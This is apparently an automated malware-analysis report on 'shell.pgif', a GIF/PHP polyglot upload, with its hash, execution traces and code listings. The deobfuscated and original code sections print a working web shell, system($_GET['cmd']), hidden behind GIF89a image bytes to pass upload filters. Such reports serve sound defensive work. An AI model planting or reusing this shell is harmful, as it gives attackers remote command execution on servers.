PHP Malware Analysis
shell.pgif
md5: 3f70c01a5bb86354ce3d7c73f930b44d
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
Deobfuscated PHP code
GIF89a�
��������������dV���W{�����~����������������f���j]����������vj��妹��~r������� �r������WI�pd�������j\����������nb�wk�fZ�]O�RC�M>���G��������^P���Dl���⟟�o�Ѧ�����,W����������������s��!�-<?php
echo "Shell";
system($_GET["cmd"]);
?>�,�����
������A
H��8��Dž��V������g0H.&�a���u��]�O���b;
!
|6~<d�0�/�c�(
%$/���)�>��3
)*'"2#�b�%'�9�-,,7��4$$"�A�;Execution traces
data/traces/3f70c01a5bb86354ce3d7c73f930b44d_trace-1676244815.0018.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:34:00.899656]
1 0 1 0.000184 393528
1 3 0 0.000230 394640 {main} 1 /var/www/html/uploads/shell.pgif 0 0
2 4 0 0.000297 394640 system 0 /var/www/html/uploads/shell.pgif 1 1 NULL
2 4 1 0.000330 394672
2 4 R FALSE
1 3 1 0.000345 394640
0.000374 314240
TRACE END [2023-02-12 21:34:00.899885]
Generated HTML code
<html><head></head><body>GIF89a
�����������dV���W{�����~���������������f���j]����������vj��妹��~r������� r����WI�pd�������j\������nb�wk�fZ�]O�RC�M>������G��������^P���Dl���⟟�o�Ѧ�����,W����������������s��!�-Shell,
����A
H��8��Dž��V��������g0H.&�a���u��]�O���b;
!
|6~<d�0� �c�(
%$="" ���)�="">��3
)*'"2#�b�%'�9�-,,74$$"�A;</d�0�></body></html>Original PHP code
GIF89a�
��������������dV���W{�����~����������������f���j]����������vj��妹��~r������� �r������WI�pd�������j\����������nb�wk�fZ�]O�RC�M>���G��������^P���Dl���⟟�o�Ѧ�����,W����������������s��!�-<?php echo "Shell"; system($_GET["cmd"]); ?>�,�����
������A
H��8��Dž��V������g0H.&�a���u��]�O���b;
!
|6~<d�0�/�c�(
%$/���)�>��3
)*'"2#�b�%'�9�-,,7��4$$"�A�;